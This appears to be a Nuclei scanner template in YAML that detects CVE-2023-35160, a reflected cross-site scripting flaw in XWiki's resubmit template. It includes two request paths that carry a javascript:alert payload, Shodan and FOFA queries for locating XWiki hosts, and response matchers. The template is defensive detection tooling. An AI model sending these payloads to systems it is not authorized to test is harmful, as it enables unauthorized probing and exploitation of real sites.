57 lines
2.2 KiB
YAML
57 lines
2.2 KiB
YAML
id: CVE-2023-35160
|
|
|
|
info:
|
|
name: XWiki >= 2.5-milestone-2 - Cross-Site Scripting
|
|
author: ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the resubmit template to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/XWiki/Main xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain). This vulnerability exists since XWiki 2.5-milestone-2. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
|
|
impact: |
|
|
Successful exploitation could lead to cross-site scripting.
|
|
remediation: |
|
|
This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1.
|
|
reference:
|
|
- https://jira.xwiki.org/browse/XWIKI-20343
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-35160
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-35160
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
vendor: xwiki
|
|
product: xwiki
|
|
shodan-query: html:"data-xwiki-reference"
|
|
fofa-query: body="data-xwiki-reference"
|
|
tags: cve,cve2023,xwiki,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"
|
|
- "{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'action="javascript:alert(document.domain)"'
|
|
- 'XWikiGuest'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- 401
|
|
# digest: 4a0a00473045022100de201adc6ad02ff55137ab13a350a43679a1cbac095f2de8b65eb814fa1b864a0220303809b36b78e2fa98a255a8eba7ad094ae57eac96e3d4d6712a03ed34d03f1c:922c64590222798bb761d5b6d8e72950 |